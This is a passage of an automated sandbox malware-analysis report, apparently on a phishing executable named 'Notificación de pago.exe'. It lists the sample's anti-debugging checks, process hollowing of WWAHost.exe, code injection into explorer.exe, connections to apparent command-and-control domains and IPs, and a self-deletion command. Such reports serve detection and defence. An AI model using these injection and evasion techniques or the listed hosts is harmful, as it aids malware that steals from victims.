          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03977D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03993D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040A130 LdrLoadDll,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 104.195.7.239 80
          Source: C:\Windows\explorer.exe | Domain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exe | Domain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exe | Domain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exe | Domain query: www.evertribute.com
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1120000
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Memory written: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\WWAHost.exe | Thread register set: target process: 3968
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: explorer.exe, 0000000B.00000000.429405183.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.340340863.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.312051884.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000B.00000000.349900984.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.434835236.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.312120732.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.357378647.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.429478272.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
